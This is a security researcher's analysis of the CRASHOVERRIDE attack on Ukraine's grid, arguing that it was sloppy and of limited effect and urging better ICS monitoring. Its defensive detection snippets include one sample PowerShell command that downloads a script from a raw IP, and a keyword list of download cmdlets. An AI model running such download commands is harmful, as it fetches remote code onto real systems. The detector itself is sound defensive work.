The CRASHOVERRIDE event is significant for many reasons: it represents the first known malware-directed attack on civilian power systems, and it marks a worrying escalation in operations against Ukrainian critical infrastructure. Yet for all its conceptual boldness in expanding cyber attack operations within industrial control systems (ICS), at a technical, practical level the attack exhibited many mistakes, errors, and outright failures in execution. When examining the event, those interested in ICS security should appreciate the theoretical underpinnings and repercussions behind it, but be careful not to lionize or deify the adversaries responsible for its (somewhat botched) execution.
As part of Virus Bulletin 2018, I recently published a white paper and gave a presentation on some of the mechanics of CRASHOVERRIDE – what steps were taken prior to its execution, and some notes on the malware framework itself. While prior work exists covering CRASHOVERRIDE – from both my employer Dragos and ESET – until recently all coverage and discussion treated CRASHOVERRIDE as a highly complex capability and its executors, ELECTRUM, as a highly capable adversary. Yet after spending significant time reviewing previously unavailable information on the attack – its actual execution as well as its precursors – I find that assessment unsupported by the evidence at hand. The following represents my personal, professional opinion on the CRASHOVERRIDE event, and is not an official position of my employer, Dragos.
Reviewing CRASHOVERRIDE, one is struck by the sheer noisiness of the attack. While the attacker leveraged credential theft and reuse for movement within the target environment, they did so in such an indiscriminate manner that good visibility into network activity should have revealed egregious authentication attempts rather quickly. For example, early in the attack, the adversary queued up remote authentication attempts via RPC against hundreds of hosts within the target network, all taking place within minutes. Such brazen, almost careless activity should be caught by a variety of detection schemes – behavioral analytics or anomaly detection – yet in this case it seems to have passed without alarm. Similarly, the attacker created adversary-controlled privileged accounts within the network – a clearly malicious action, but one that can only be identified if host-based monitoring is active and reviewed within the environment. I do not want this to turn into a shaming of the victims, but perhaps those of us in the ICS community can take it as a clear signal that visibility and monitoring within control system networks must improve to catch what should be blatantly obvious malicious actions.
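To make the "behavioral analytics" point concrete, consider a minimal detection sketch for exactly this pattern: one account attempting remote authentication against an unusually large number of distinct hosts in a short window. This is purely illustrative – the event fields, threshold, and window are assumptions, not details recovered from the victim environment:

```python
from collections import defaultdict
from datetime import timedelta

# Hypothetical sketch: flag any account that attempts remote authentication
# against an unusually large number of distinct hosts within a short window.
# The field layout (timestamp, account, dest_host) and the thresholds are
# assumed, not taken from any specific log schema or from the incident data.

WINDOW = timedelta(minutes=5)
HOST_THRESHOLD = 50  # arbitrary; tune to the environment's normal baseline

def flag_bursty_auth(events):
    """events: iterable of (timestamp, account, dest_host) tuples, sorted by time."""
    recent = defaultdict(list)  # account -> [(timestamp, dest_host), ...]
    alerts = []
    for ts, account, host in events:
        window = [(t, h) for t, h in recent[account] if ts - t <= WINDOW]
        window.append((ts, host))
        recent[account] = window
        distinct_hosts = {h for _, h in window}
        if len(distinct_hosts) >= HOST_THRESHOLD:
            alerts.append((ts, account, len(distinct_hosts)))
    return alerts
```

Even a crude rule of this sort, fed by authentication logs that are actually collected and reviewed, would have lit up during the lateral movement described above.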
Moving beyond command-line (or scripted) noise, the attacker was similarly so confident in their ability (or in the lack of defensive visibility) that multiple scripting objects – from VB scripts to PowerShell – were executed with absolutely no obfuscation whatsoever. This includes obviously suspect behavior such as PowerShell downloading directly from an IP address and extensive scripting for remote program execution and system survey.
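Behavior like "PowerShell retrieving content directly from a raw IP address" is simple enough to describe that it can be flagged with little more than string matching over command-line telemetry. The sketch below is hypothetical – the keyword list and the sample command line are illustrative, not artifacts from the intrusion:

```python
import re

# Hypothetical sketch: flag process command lines where PowerShell appears to
# fetch content directly from a raw IP address rather than a hostname.
# The sample command line below is illustrative, not a recovered artifact.

RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}")
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest", "start-bitstransfer")

def is_suspect_powershell(cmdline: str) -> bool:
    lowered = cmdline.lower()
    if "powershell" not in lowered:
        return False
    return bool(RAW_IP_URL.search(lowered)) and any(hint in lowered for hint in DOWNLOAD_HINTS)

sample = 'powershell -nop -c "(New-Object Net.WebClient).DownloadString(\'http://203.0.113.10/a.ps1\')"'
print(is_suspect_powershell(sample))  # True
```

None of this requires exotic tooling – only that process command lines and script execution are logged somewhere a defender actually looks.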
All of the above could be shrugged off as an adversary simply “living down” to the targeted environment, expending no more effort than necessary to execute an attack given poor visibility within the control system environment. This seems plausible, but closer investigation of the actual attack reveals additional concerns and signs that perhaps this was not as detailed and well-planned an operation as one might initially think.
First, there is an odd amount of variation among the different components of CRASHOVERRIDE and the different versions of the attack tool. Previously, most work focused on the “primary” framework: a launcher combined with an effects DLL, a configuration file, and a wiper DLL. Yet at least three variants of the supposedly unified CRASHOVERRIDE framework were in play for the attack: the pattern described above; a variant using a hardcoded configuration file instead of one designated positionally on the command line; and another variant combining two effects packages in a single self-contained executable. Furthermore, variations between packages – such as whether the OPC-targeting module could enumerate connected OPC servers for potential targets – indicate further diversity in what was initially thought to be a comprehensive, modular framework.
Second, when looked at in terms of actual functionality, it is not clear that many of the modules would have worked as coded. For example, the IEC-104 targeting module changes states on the targeted substations or controllers in a way that may simply be ignored because it violates expected state transitions. My colleagues Dan Gunter and Dan Michaud-Soucy (aka “The Dans”) recently gave a talk at CS3STHLM on this topic, noting that stateful controls and recognition provide non-trivial barriers to ICS-specific malware functionality. For example, a traffic light proceeds through defined states in a determined order – green to yellow to red to green in the United States. State changes outside this order – e.g., green directly to red – are anomalous, and potentially unactionable, resulting at minimum in confusion and at worst in a breakdown of the system in question. For CRASHOVERRIDE, modules such as the IEC-104 targeting component were simply not state-aware per the protocol, and testing in a lab environment resulted in… no noticeable effect. Quite simply, ignorance of how the protocol is actually supposed to work (as opposed to simply shifting target breakers from “Closed” to “Open” states) rendered a seemingly complex payload rather inert in practice.
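The underlying idea is easy to show in miniature. The sketch below uses the traffic-light analogy from the paragraph above, not IEC-104 itself: a state-aware receiver only honors requests that follow the defined sequence and silently drops everything else – roughly what happened to the malware's out-of-order commands in testing:

```python
# Illustrative sketch of stateful validation using the traffic-light analogy
# from the text; this is not IEC-104 logic, just the general principle that a
# state-aware receiver ignores transitions falling outside the defined order.

VALID_TRANSITIONS = {
    "green": {"yellow"},
    "yellow": {"red"},
    "red": {"green"},
}

class StatefulLight:
    def __init__(self, state: str = "green"):
        self.state = state

    def request(self, new_state: str) -> bool:
        """Apply a requested change only if it follows the defined order."""
        if new_state in VALID_TRANSITIONS[self.state]:
            self.state = new_state
            return True
        return False  # out-of-order request: ignored

light = StatefulLight()
print(light.request("red"))     # False – green straight to red is rejected
print(light.request("yellow"))  # True
print(light.request("red"))     # True
```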
Finally, separate from CRASHOVERRIDE itself, the attacker developed and deployed a disruptive module using a denial of service (DoS) vulnerability in Siemens SIPROTEC devices, first disclosed in 2015. Of note, this DoS tool is very specific to the targeted environment – target IP addresses are hardcoded within the malware itself, making it ineffective and irrelevant outside of the 2016 victim. Yet while the vulnerability itself appears to be properly targeted, the byte conversion used to turn those IP addresses into actual sockets for triggering the vulnerability is applied incorrectly. Each hardcoded address is therefore read “backwards” when creating the communication socket, rendering the tool useless.
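For readers unfamiliar with this class of bug, a byte-order mistake when packing an IPv4 address effectively reverses its octets, so the tool ends up trying to reach an entirely different (and almost certainly nonexistent) host. The snippet below is a generic illustration of that failure mode – the address shown is a documentation example, not one of the hardcoded targets:

```python
import socket
import struct

# Generic illustration of an IPv4 byte-order mistake: packing the address with
# the wrong endianness before building a socket address reverses its octets.
# The address below is an example value, not one of the hardcoded targets.

addr = "192.0.2.10"
packed = socket.inet_aton(addr)                         # network (big-endian) byte order
misread = struct.unpack("<I", packed)[0]                # mistakenly read as little-endian
garbled = socket.inet_ntoa(struct.pack(">I", misread))  # the address actually contacted

print(addr, "->", garbled)  # 192.0.2.10 -> 10.2.0.192
```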
For all of these reasons, the sophisticated, frightening attack that is CRASHOVERRIDE resulted in a rather minor disruption: the total number of households impacted and the duration of impact were both noticeably lower than in the 2015 Ukraine power outage, which relied on a far simpler attack mechanism. As an aside, it is for these (and related) reasons that the term INDUSTROYER – used by ESET with the clearly stated implication that the malware represented the greatest threat to ICS since Stuxnet – seems ill-fitting and unjustified. While work was certainly expended to complete what would become CRASHOVERRIDE, the attack and its components are brittle, fragile, and, to the extent that they worked in the target environment, difficult (or impossible) to port elsewhere. Thus, treating the attack for what it is – unique, ICS-targeting malware, but of limited efficacy – seems reasonable. I say this while having incredible professional respect for ESET researchers Anton Cherepanov and Robert Lipovsky, who are both excellent malware analysts and have done significant good for the community; my thoughts on the “bigger picture” surrounding CRASHOVERRIDE are not meant as a slight to their excellent technical analysis.
Shifting away from “how” CRASHOVERRIDE represented a less-than-ideal attack, or one less sophisticated than originally envisioned, we must ask “why”: why did this event rely on seemingly poor methodology and ineffective tools, considering the stakes? On this, we can never truly know without directly interviewing those responsible for building, developing, and ultimately deploying the malware. But since this is at heart an opinion piece, I can offer some theories that may explain the shoddiness behind the attack.
First, the attack may have simply been rushed. While evidence indicates access to the target environment beginning no later than October 2016, and possibly as early as January of the same year, one may reasonably conclude that a deadline existed for attack execution: mid- to late December 2016, to match the timing of the 2015 attack. In establishing that deadline, the adversary (or their controlling authority) may have unintentionally “rushed” development and deployment of the actual capability in play. This would explain the lack of operational security around some of the control system network lateral movement (a rush to get in place) and the variation in attack framework code – essentially, based on the differences in modules deployed, one could almost claim that code was “shipped” as soon as it compiled, with little regard for accuracy or efficacy.
A second theory is that two teams were involved in executing the attack: an initial access team (in this specific case, likely the Sandworm team) handed off operations to an ICS specialist group, and that ICS operations group was either incompetent or inexperienced, resulting in the problems documented above. While such a division of labor is plausible for large, segmented organizations, this theory doesn't seem to hold water: it defies logic to hand over a sensitive operation to an inexperienced, less capable team following initial access, even if that team possessed specialized knowledge that would enable some parts of the attack. However, exploring this possibility reveals something relevant to attribution of the CRASHOVERRIDE event. While some organizations were quick to identify Sandworm as a likely culprit given location and past history in Ukraine, the failures documented above argue strongly against a team with Sandworm's capability being responsible. That an advanced, accomplished, and experienced group such as Sandworm would commit the documented errors, when it has exhibited commendable operational security and tradecraft in other operations, seems hard to defend.
Finally, it is possible that the attack itself was meant as nothing more than a demonstration – of both capability (that electric distribution-targeting software exists) and intent (that the adversary is unafraid to actually use such a capability). In this case, the technical sophistication and security of the operation matter far less than the simple fact that the event happened at all. In fact, from a strategic messaging perspective, one could argue that the sloppiness of CRASHOVERRIDE may even have been more effective in communicating a willingness to deploy ICS-focused attacks, since the operation does not appear to even try to “hide” or evade detection. Unfortunately, this is perhaps the hardest motive to prove short of access to the perpetrators, but it remains a tantalizing theory given the brazen nature of the attack.
Yet for all of these questions of “why” and curiosity at the technical failures, there remain a number of technically interesting items in the attack. For one, the attack did attempt to apply a level of automation to ICS manipulation and disruption not seen since Stuxnet, even if the level of sophistication (to say nothing of the actual execution) pales in comparison to that seminal event. In this fashion, CRASHOVERRIDE can be seen as gradually moving the bar for ICS attacks forward (provided you accept Stuxnet as an outlier, which I do). Even so, the attack remains immature and rather limited in effects – making much of the resulting hype unjustified or inaccurate. The attack is significant for abstract, technical reasons within the information security space, but cannot (as currently constructed) be leveraged to expand disruptive effects to far wider circumstances or consequences – at least, not without significant alterations and rewrites.
Yet – what if CRASHOVERRIDE was not a finalized tool, but rather some hybrid between a demonstration capability (for strategic messaging) and “in production” testing? This theory gains some weight when considering more recent developments surrounding Sandworm and linked activity in Eastern and Central Europe. For example, ESET's recent reporting on Telebots activity and GreyEnergy shows that technical elements associated with both the 2015 and 2016 Ukraine power events remain active and are continuing to evolve over time. From my perspective, what is most interesting is how portions of the CRASHOVERRIDE attack (such as the superfluous backdoor associated with the CRASHOVERRIDE malware) contain technical links to subsequent developments associated with Sandworm (aka Telebots) and then GreyEnergy.
In this case, CRASHOVERRIDE's use (and many errors) may very well reside within the “testing” category, albeit in an external (if permissive) environment. To rephrase: CRASHOVERRIDE was deployed, potentially prematurely, as a technical demonstration not only to Ukraine but to many other parties that 1) such a capability (even if incomplete or not yet fully effective) exists, and 2) those possessing such a capability are willing to use it. This has been stated before, but when married with the identification of evolved versions of components behind the attacks (noted above and very well analyzed by ESET), the attack can be placed in greater context: not an “end in itself”, but rather a “means to an end” – namely, demonstrating both a technical capability to disrupt electric distribution operations and a willingness to use it, while continuing to refine that capability for future operations.
At this stage, for all the amateurism behind the CRASHOVERRIDE event and its execution, the attack remains worrying not as an event in itself, but as a precursor of things to come. In light of what we know about how the attack was executed, ICS asset owners and operators need to invest NOW in capabilities to improve monitoring and visibility, extending into host process and command execution and scripting framework logging. Furthermore, while CRASHOVERRIDE is riddled with mistakes and miscalculations for unknown reasons, recently identified items exposing evolved versions of tools associated with past Ukraine-linked events strongly indicate that CRASHOVERRIDE is not static – rather, one should anticipate continued development of this capability to make it more effective for future use. Thus, while the 2016 Ukraine attack on its own does not represent an especially sophisticated attack and can be judged – in isolation – as something of a failure, more worrisome is the very real possibility that this attack was just a trial run or “warm up” to test capabilities (and victim responses), with the intention of developing and deploying more complex and robust tools based on lessons learned.